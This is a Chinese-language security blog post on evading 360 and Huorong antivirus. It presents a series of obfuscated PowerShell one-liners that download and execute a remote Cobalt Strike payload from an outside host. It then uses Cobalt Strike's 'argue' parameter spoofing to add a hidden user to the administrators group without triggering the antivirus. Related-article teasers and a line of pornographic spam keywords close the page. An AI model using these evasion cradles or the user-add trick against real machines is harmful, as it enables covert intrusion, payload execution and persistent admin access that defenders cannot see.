<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    powershell對抗AV技巧

    VSole2021-06-30 22:32:22

    免殺上線一直是經久不衰的話題,今天介紹利用powershell上線來繞過360與火絨的防護,并介紹繞過添加用戶的攔截的方式,我們的實驗環境是一臺裝了360全家桶與火絨的win7。

    一.powershell免殺繞過360與火絨上線:

    1.powershell免殺繞過思路參考:

    powershell 命令混淆

    原始payload
    Invoke-Expression (New-Object Net.WebClient).DownloadString('http:9821.ink/xxx')
    安全客
    將http分開+號連接
    Invoke-Expression (New-Object Net.WebClient).DownloadString("ht"+"tp://9821.ink/xxx")
    變量代替
    IEX $wc=New-Object Net.WebClient;$wc.DownloadString('h'+'ttp://9821.ink/xxx')
    轉義符號加在其他字符前不影響字符的意思,避免在0,a,b,f,n,r,t,v的小寫字母前出現即可。
    Invoke-Expression (New-Object Net.WebClient)."Down`loadString"('h'+'ttp://9821.ink/xxx')
    同樣可以使用在Net.Webclient上
    Invoke-Expression (New-Object "`Ne`T.`Web`Cli`ent")."Down`l`oadString"('h'+'ttp://9821.ink/xxx')
    freebuf
    powershell -NoExit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://9821.ink/xxx'')'.Replace('123','adString');IEX ($c1+$c2)"
    powershell "$a1='IEX ((new-object net.webclient).downl';$a2='oadstring(''http://9821.ink/xxx''))';$a3="$a1,$a2";IEX(-join $a3)"
    chabug #別名
    powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://9821.ink/xxx')
    綜合起來 就成了最開始的上線命令:
    powershell set-alias -name kaspersky -value Invoke-Expression;"$a1='kaspersky ((new-object net.webclient).downl';$a2='oadstring(''http://9821.ink/xxx''))';$a3=$a1,$a2;kaspersky(-join $a3)"

    那么看了一些powershell的繞過上線cs思路,我們來執行修改命令達到上線

    首先還是最原始的生成常見的方式來上線cs:

    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.12.20:80/a'))"

    我們可以看到,此時火絨發現了系統調用了powershell,立刻進行了攔截,那么我們就要修改powershell上線的命令,進行繞過達到上線。

    原命令:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.12.20:80/a'))"

    我們可以利用powershell的特性,利用別名、分割、替換變量等多個方式來繞過檢測。

    修改后的命令:

    powershell -c "IEX(New-Object Net.WebClient)."DownloadString"('ht‘+’tp://192.168.12.20:80/a')"

    可以看到修改后的命令,對執行的命令進行替換,并將http分開+號連接的思路,便可以達到免殺上線效果。

    360與火絨均無報警,CS已經上線,成功繞過殺軟達到上線目的。

    二.繞過殺軟添加用戶

    在內網滲透過程中,有些時候需要往目標機器添加用戶,來進行所需操作,但是添加用戶殺軟非常敏感,都會進行攔截。

    為了突出文章目的,我們直接使用cs自帶的提權EXP來達到system權限。

    我們直接在cs進行用戶添加。可以看到遭到了360的攔截:

    beacon> shell net user tubai e2e2@wqw /add

    此時的思路可以使用cs中argue參數繞過殺軟添加用戶:

    #參數污染net1 argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    #查看污染的參數 argue

    #用污染的net1執行敏感操作 execute net1 user tubai ddsd@123 /add

    此時shell net user發現,tubai用戶已經添加進去,且360與火絨均未攔截

    我們再將tubai用戶加入到administrator組

    beacon> execute net1 localgroup administrators tubai /add

    此時我們shell net user tubai ,發現已經成功加入administrators組中

    至此便繞過了360與火絨對添加用戶的攔截。

    總結

    powershell的繞過方式除了命令混淆還有很多,免殺的目的就是圍繞你的目標機器進行實施的,并非要追求免殺率,過VT,只要過了你的目標機就好。還有,如無特殊需要,滲透過程中還是不添加用戶為妙,畢竟日志都有記錄,動靜也不小。

    參考:

    http://www.0x3.biz/archives/837.html

    https://xz.aliyun.com/t/7903#toc-0

    安全措施:

    各位要對powershell動作進行管控,勿用技術做未授權的事情!有興趣可以關注公眾號:花指令安全實驗室,我們一起探討學習交流!

    powershell免殺
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    顧名思義,無需將惡意文件傳到目標服務器/機器上,直接利用powershell的特性加載到內存執行。為了在紅隊行動中更隱蔽的實施攻擊以及橫向移動,同時還可以解決目標不出網只能通過dns上線時的棘手問題,利用powershell可以避免一行行echo。
    powershell之路
    2021-07-12 21:46:00
    Windows PowerShell 是一種命令行外殼程序和腳本環境,使命令行用戶和腳本編寫者可以利用 .NET Framework的強大功能
    目錄簡單的惡意文檔cs生成的宏分析思路加密混淆誘導點擊項目推薦總結簡單的惡意文檔一般使用流程:第一步,生
    powershell對抗AV技巧
    2021-06-30 22:32:22
    今天介紹利用powershell上線來繞過AV防護,并介紹繞過添加用戶的攔截的方式。
    通常我們在滲透過程中從外圍打點進入內網后拿到主機提升到system權限,這一臺主機就已經拿下。但是我們進入內網的目標還是拿下盡可能多的主機,這時候選擇橫向移動的方法就尤為重要。今天就對一些常用的橫向手法進行一個總結,有不足之處歡迎師傅們進行斧正。
    前言某次小型紅藍,直接丟過來幾個登陸框,定點打。環境介紹全部都是shiro框架。過程爆破用戶名密碼,都是加密的。查看網頁源代碼的時候,發現其中一個利用的DES-ECB的單層加密。果斷生成大量的字段。我的超大字典,都沒有爆破出一個有效的賬號。一上午毫無收獲,陷入沉思。用上午在A系統登陸顯示沒有應用權限的賬號,但是不會自動解壓,沒有找到可以利用的點。在目標機器部署了cs。
    0X01起源在攻防演練中通過運行惡意代碼連接C2是最常用的手段,但是由于對抗程度的提升。以360、天擎為代表的毒軟件針對信任鏈的檢測,已經變得愈來愈成熟。這里我們可以理解為,攻擊者通過利用"白加黑"這種攻擊方法。當攻擊者通過社工釣魚的手段,使得目標下載惡意的文件到目標自己的計算機上,并點擊運行白文件時,該文件會在運行時執行惡意DLL。
    時間線11 月 10 日,我們發現了一次多階段 PowerShell 攻擊,該攻擊使用冒充哈薩克斯坦衛生部的
    好久沒寫實戰文章了,過年過的手都麻了,一天不滲透我是渾身難受。正想找幾個站泄泄火呢。剛好就接到了領導的任務,需要我去參加某集團組織的攻防演練。過程即簡單也曲折,好在成功繞過waf,且橫向滲透取得辦公區運維機權限,最終取得工控生產區服務器權限,完成滲透目標,skr~skr~。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类